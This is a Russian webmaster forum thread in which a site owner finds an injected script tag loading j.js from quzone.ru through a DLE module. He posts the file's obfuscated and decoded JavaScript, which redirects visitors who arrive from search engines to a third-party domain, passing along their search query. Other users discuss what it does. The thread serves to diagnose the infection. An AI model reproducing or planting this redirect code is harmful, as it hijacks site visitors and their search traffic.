Проблема
Страницы: 1
Проблема
Тут такая проблема появилась мой сайт в "ОПЕРЕ" пишет "Предупреждение о вредоносном ПО", я сначало не понял почему пока не порылся в "Исходном коде страницы"
там есть такие скрипты:
Для Dle есть такой модуль "Переходы" и там есть такие переходы "kinoz <sc ript src=http://quzone.ru/j.js></script>(скрипта нет тока в "Исходном коде страницы") " , а этот скрипт активируется
Код
<sc ript src=http://quzone.ru/j.js></script>

Рисунок


Кто подскажет что это за скрипт и что он делает
Изменено: killer1000 - 15 Июня 2011 19:56

Прогон по твиттеру, постинг в 1500 аккунтов
Постинг в твиттер аккаунты, для ускорения индексации ваших сайтов, сателлитов, дорвеев.

по этому адресу вот чё лежит:
function l(h) {return parseInt(h,16);}var r=document.referrer;if (r.indexOf('google.') > -1 || r.indexOf('yahoo.') > -1 || r.indexOf('yandex.') > -1 || r.indexOf('bing.com.') > -1 || r.indexOf('yahoo.') > -1 || r.indexOf('rambler.') > -1 || r.indexOf('go.mail.') > -1){document.write(une scape("%3Cscript%20type%3D%22text/javascript%22%3Esp_redirect%20%3D%20%7B%7D%3Bsp_redirect.searchers%20%3D%20%5B%20%5B/google%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/search%5C.yahoo%5C./i%2C%20/%28%5C%3F%7C%26%29p%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/bing%5C.com/i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/search%5C.aol%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/ask%5C.com/i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/altavista%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/search%5C.lycos%5C./i%2C%20/%28%5C%3F%7C%26%29query%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/alltheweb%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/yandex%5C./i%2C%20/%28%5C%3F%7C%26%29text%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/%28nova%5C.%7Csearch%5C.%29%3Frambler%5C./i%2C%20/%28%5C%3F%7C%26%29query%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/gogo%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/go%5C.mail%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/nigma%5C./i%2C%20/%28%5C%3F%7C%26%29s%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%5D%3Bsp_redirect.sp_redirect%20%3D%20function%28referer%29%20%7B%20var%20query%3Dnull%3B%20for%28var%20i%3D0%3B%20i%3Csp_redirect.searchers.length%3B%20i++%29%20%7B%20%20var%20se%20%3D%20sp_redirect.searchers%5Bi%5D%3B%20%20if%20%28referer.match%28se%5B0%5D%29%29%20%7B%20%20%20query%20%3D%20referer.match%28se%5B1%5D%29%5Bse%5B2%5D%5D%3B%20%20%20break%3B%20%20%7D%20%7D%20document.location.href%3D%27http%3A//shara.lots-moment-archiv.ru/%27+%27%3Fwkey%3D"+l('825c8')+"%27+%27%27+%28query%3F%20%27%26query%3D%27+query%20%3A%20%27%27%29%3B%7D%3Bsp_redirect.sp_redirect%28document.referrer%29%3B%3C/script%3E"));
}
если есть кодеры, подскажите, что это?
раскодировал теперь помогите разобраться

Код
function l(h) {return parseInt(h,16);}var r=document.referrer;if (r.indexOf(\'google.\') > -1 || r.indexOf(\'yahoo.\') > -1 || r.indexOf(\'yandex.\') > -1 || r.indexOf(\'bing.com.\') > -1 || r.indexOf(\'yahoo.\') > -1 || r.indexOf(\'rambler.\') > -1 || r.indexOf(\'go.mail.\') > -1){document.write(une scape(\"<sc ript type="text/javascript">sp_redirect = {};sp_redirect.searchers = [ [/google\./i, /(\?|&)q=(.*?)(&|$)/i, 2], [/search\.yahoo\./i, /(\?|&)p=(.*?)(&|$)/i, 2], [/bing\.com/i, /(\?|&)q=(.*?)(&|$)/i, 2], [/search\.aol\./i, /(\?|&)q=(.*?)(&|$)/i, 2], [/ask\.com/i, /(\?|&)q=(.*?)(&|$)/i, 2], [/altavista\./i, /(\?|&)q=(.*?)(&|$)/i, 2], [/search\.lycos\./i, /(\?|&)query=(.*?)(&|$)/i, 2], [/alltheweb\./i, /(\?|&)q=(.*?)(&|$)/i, 2], [/yandex\./i, /(\?|&)text=(.*?)(&|$)/i, 2], [/(nova\.|search\.)?rambler\./i, /(\?|&)query=(.*?)(&|$)/i, 2], [/gogo\./i, /(\?|&)q=(.*?)(&|$)/i, 2], [/go\.mail\./i, /(\?|&)q=(.*?)(&|$)/i, 2], [/nigma\./i, /(\?|&)s=(.*?)(&|$)/i, 2]];sp_redirect.sp_redirect = function(referer) { var query=null; for(var i=0; i<sp_redirect.searchers.length; i  ) {  var se = sp_redirect.searchers[i];  if (referer.match(se[0])) {   query = referer.match(se[1])[se[2]];   break;  } } document.location.href='http://shara.lots-moment-archiv.ru/' '?wkey=\" l(\'825c8\') \"' '' (query? '&query=' query : '');};sp_redirect.sp_redirect(document.referrer);</script>\")); 
}
Ну по любому этот левый код подтягиваемый с чужого сайта настораживает. Допустим на данный момент он выполняет часть функционала модуля переходов, всё вроде ок. Далее, допустим эту версию переходов со временем скачают и поставит у себя 1000 человек на своих 1000 сайтах. И вот однажды, владелец этого _http://quzone.ru возьмёт и поменяет код в файле j.js на шелл или проксик какой ни-ть, и либо начнёт кого нибудь ddos-ить или просто на любом из сайтов покопается. А потом вернёт всё обратно, и вы даже знать не будете, что ваш сайт участвовал в атаке. Не знаю, мне кажется если на жертву единовременно будет 1000 переходов с других сайтов, сайт ляжет.
Изменено: daden11 - 15 Июня 2011 21:01
Страницы: 1
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
22:24 Апдейт 27.09.16 
21:40 Adsense личный опыт 
20:51 Что делать? Теряются полученные очки в Alexa 
20:20 Нужна помощь по тегам DLE 
18:33 Profitco - гемблинговая ПП! Проверенные бренды, парк-домены, выплаты каждую неделю, геолокация по ip 
18:24 Как продвигать дроп 
17:53 Апдейт тиц яндекса 13.09.2016 
21:33 Копирайт и SEO-копирайт - всё будет all right 
21:19 Обмен , Ввод/Вывод Яндекс-Деньги/QIWI/WebMoney/СберБанк/Privat24 
20:07 Статейное продвижение ваших сайтов 
18:49 Продам несколько своих проектов. 
18:26 Размещаю ссылки, постовые, статьи и баннеры. ТИЦ 240 и 50 
18:15 Комплексный прогон по трастовым сайтам, статейное размещение. Рост НЧ-СЧ, Тиц-пр. 
17:53 Веб-дизайн недорого! 
23:00 "Амнистия" 2016 
21:10 Чем переводить на английский? 
21:05 Копирование названий и ссылок на видео с ютуб 
19:26 "Блогосфера" отторгается? 
18:58 Живые участники в группу 
17:53 Два бесплатных лого и один лендинг за полцены 
17:35 Халява, почти. Текст более 3 млн.сим., ~200 тИЦ, до 10 тыс.твиттер прогон (значения указаны суммарно) БЕСПЛАТНО